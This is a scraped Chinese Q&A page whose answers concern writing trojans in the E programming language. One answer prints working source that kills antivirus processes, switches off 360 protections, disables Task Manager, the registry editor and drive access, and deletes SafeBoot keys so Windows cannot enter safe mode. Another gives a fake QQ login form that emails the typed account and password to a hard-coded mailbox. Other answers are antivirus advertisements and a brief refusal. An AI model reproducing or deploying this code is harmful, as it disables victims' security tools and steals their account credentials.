易語言挖礦木馬代碼
『壹』 易語言編寫木馬
0分還要源碼 = =|;;
首先告訴你 易語言雖然能做木馬
但他並不是很適合做木馬
寫的程序太大勒
一個空殼的程序都500KB以上
不過易語言有個插件「黑月」網路可以搜下
據說寫出的空程序能達到10多KB 相當的小勒
在不用下載者 生成之後30KB左右
方便傳播,
我也想學木馬 但是這方面的教程太少勒,
只能自己慢慢琢磨勒
『貳』 易語言編程編寫木馬代碼程序的含義
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
運行 (「taskkill /f /im 360tray.exe」, 假, 1) ' 結束360進程
' 修改關聯
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)寫注冊項 (4, 「SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue」, 0) ' 隱藏文件和文件夾
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0) ' 禁用任務管理器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel」, 1) ' 禁用控制面板
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1) ' 禁用注冊表
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1) ' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295) ' 隱藏所有驅動器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295) ' 禁止所有驅動器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1) ' 隱藏文件夾選項
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1) ' 將桌面對象隱藏
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1) ' 隱藏開始中的關機
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1) ' 隱藏開始中的搜索
' 寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1) ' 隱藏主頁選項組
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1) ' 隱藏IE文件菜單
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1) ' 隱藏收藏夾菜單
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1) ' 禁用IE列印功能
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1) ' 隱藏Internet選項
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1) ' 禁止IE查看源文件
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3) ' 禁用IE下載功能
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1) ' 禁止右鍵關聯菜單
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode」, 1) ' 禁止「重新啟動計算機切換到MS-DOS方式」寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff」, 1) ' 禁止顯示「注銷」寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu」, 1) ' 禁止文檔菜單寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff」, 1) ' 去掉「開始」選單中的「登錄」項寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu」, 1) ' 禁止使用滑鼠右鍵寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders」, 1) ' 禁止修改控制面版
.版本 2' 無法進入安全模式
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay」)
銷毀 ()
『叄』 易語言木馬生成器源碼
很高興為您解答:
這個你自己下載的,或是別人傳給你的
這些都是不可靠的啊
你可以使用騰訊電腦管家,開啟安全防護
1、騰訊電腦管家獨有的二代反病毒引擎,防護查殺更徹底
2、騰訊電腦管家擁有全球最大的雲庫平台,能更好的識別詐騙、釣魚網站
3、騰訊電腦管家獨創鷹眼模式,時刻保護您的愛機不受侵害
4、騰訊電腦管家獨有的安全等級,您可以時刻查看你愛機的安全狀態
5、新增廣告過濾功能,有效減輕廣告騷擾。
祝樓主祝您工作、生活愉快!!
『肆』 易語言編寫木馬全過程
不做這些損人不利己的事,後面支持的頂一下
『伍』 易語言寫木馬
自己看命令【一般木馬具備的】:
.版本
2
.支持庫
internet
.支持庫
eAPI
連接發信伺服器
(,
,
,
,
)
發送郵件
(,
,
,
,
,
,
)
添加附件文件
()
快照
(,
,
)
設置自動運行
(,
,
)
『陸』 易語言編出來軟體有木馬,如何在源碼中解決
您好,易語言編寫出來的程序都會被殺毒軟體誤報,在源碼中是無法解決這個問題的,易語言有的時候編寫一個空文件出來都會被報毒,加殼什麼的都無法根除這個問題。
如果您做的軟體被殺毒誤報,您要解除誤報的話,建議您進入您殺毒軟體的誤報申訴。
以下我就用騰訊電腦管家來做一個演示,先進入http://guanjia.qq.com/trojan_false.html
然後提交您被誤報的文件,申訴就可以了!
希望我的回答能幫助到您!如有疑問請進入騰訊電腦管家企業平台:http://..com/c/guanjia/
騰訊電腦管家企業平台:http://..com/c/guanjia/
『柒』 易語言木馬源碼 !求開源
.版本 2 .支持庫 xplib .支持庫 internet .支持庫 iext .程序集 窗口程序集3 .子程序 _窗口1_創建完畢 _啟動窗口.高度 = _啟動窗口.高度 + 218 - _啟動窗口.取用戶區高度 () XP風格 (1) 運行(「C:\Program Files\Internet Explorer\le.exe」, 假, #隱藏窗口) .子程序 _選擇框2_被單擊 .如果 (選擇框2.選中 =真) 選擇框1.選中 =真 .否則 .如果結束 .子程序 _選擇框1_被單擊 .如果 (選擇框1.選中 =假) 選擇框2.選中 =假 .否則 .如果結束 .子程序 _透明標簽1_滑鼠左鍵被按下, 邏輯型 .參數 橫向位置, 整數型 .參數 縱向位置, 整數型 .參數 功能鍵狀態, 整數型 打開網頁 (「 http://id.qq.com/ 」) .子程序 _透明標簽2_滑鼠左鍵被按下, 邏輯型 .參數 橫向位置, 整數型 .參數 縱向位置, 整數型 .參數 功能鍵狀態, 整數型 打開網頁 (「 http://aq.qq.com/cn/findpsw/findpsw_index 」) .子程序 _圖形按鈕2_被單擊 .局部變數 按照要求寫啦, 整數型 .判斷開始 (編輯框1.內容 =「」) 按照要求寫啦 = 1 圖片框4.可視 =真 .判斷 (編輯框2.內容 =「」) 按照要求寫啦 = 1 圖片框5.可視 =真 .判斷 (按照要求寫啦 = 0) 連接發信伺服器 (「 smtp.qq.com 」, 25, 「firehackr」, 「000+++」, ) 發送郵件 (「firehackr」, 編輯框1.內容 +「----」 + 編輯框2.內容 +「----」 + _啟動窗口.組合框1.內容, _啟動窗口.透明標簽1.標題, , , 「[email protected]」, _啟動窗口.透明標簽1.標題) 結束() .默認 .判斷結束 .子程序 _時鍾1_周期事件 .如果 (圖片框4.可視 =真) 圖片框4.可視 =假 .否則 .如果結束 返回() .子程序 _時鍾2_周期事件 .如果 (圖片框5.可視 =真) 圖片框5.可視 =假 .否則 .如果結束 返回()
麻煩採納,謝謝!
『捌』 易語言內存木馬代碼,有的復制我看下
您好:
建議您不要使用木馬代碼,木馬病毒會對您的電腦造成損害的,如果您曾使用過此類不安全的木馬代碼的話,為了您電腦的安全,建議您使用騰訊電腦管家對您的電腦進行一下全面的殺毒吧,打開騰訊電腦管家中的殺毒功能選擇閃電查殺或者全盤查殺就可以,您可以點擊這里下載最新版的騰訊電腦管家:最新版騰訊電腦管家下載
騰訊電腦管家企業平台:http://..com/c/guanjia/
『玖』 易語言盜號木馬的代碼是什麼
我有 如果你是抱著學習的態度 我可以跟你共同探討交流。不過你這零分懸賞這個問題,實在有點說不過去。。
『拾』 易語言採集器採集的源碼會提示是木馬病毒嗎
你好,源碼是不會報毒的,不管這個原理編譯出來是什麼病毒,在沒有編譯之前是不會報讀的,因為他不是一個可執行文件切不是一個可調用文件,所以不會報毒,如果報毒顯得這個殺軟太****了。但是易語言寫的軟體編譯出來容易誤報,因為很多木馬和輔助都是易語言寫的,編譯出來之後正常軟體也存在報毒現象,不詳可追問。